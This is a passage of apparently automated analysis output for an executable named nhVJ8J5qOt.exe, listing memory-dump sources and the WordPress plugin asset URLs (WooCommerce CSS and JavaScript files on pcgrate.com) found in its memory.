00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/css/gpls_woo_rfq.css?v
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.3.7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.jquery.min.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.min.css?ver
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.3.7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/style.css?ver=3.1.7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/toggle-switch.css?ver=3.1.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 